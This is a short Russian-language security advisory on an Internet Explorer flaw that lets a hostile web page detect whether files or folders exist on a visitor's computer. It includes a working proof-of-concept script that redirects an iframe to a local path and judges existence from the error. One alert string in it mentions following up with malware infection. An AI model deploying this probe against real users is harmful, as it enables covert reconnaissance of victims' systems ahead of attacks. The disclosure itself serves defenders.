Раскрытие существования файла и каталога на целевой системе в Microsoft Internet Explorer

Описание: Уязвимость обнаружена в Microsoft Internet Explorer. Удаленный пользователь может создать HMTL, который, когда будет загружен целевым пользователем, определит существование определенного файла или каталога на целевой системе пользователя.

Когда несуществующий файл или каталог назначен к iframe, браузер сгенерирует сообщение об ошибке. Удаленный пользователь может создать HTML код, который загрузит iframe и изменит iframe URL к локальному файлу или каталогу и затем по сообщению об ошибке определит существование локального файла или каталога. Пример:

<iframe src="http://www.lafrase.net"></iframe>
<script type="text/javascript">
onload=function () {
var sLocal="C:/some_file_or_folder";
frames[0].location.href=sLocal;
setT imeout(
function () {
try {
frames[0].document;
alert(sLocal+" does not exists.\nHere could execute a script that infects
the computer with some virus, trojan, etc");
} catch (oErr) {
alert(sLocal+" Exists.\nThen do nothing");
}
},
250
);
}
</script>

URL производителя: http://www.microsoft.com/technet/security/default.mspx

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.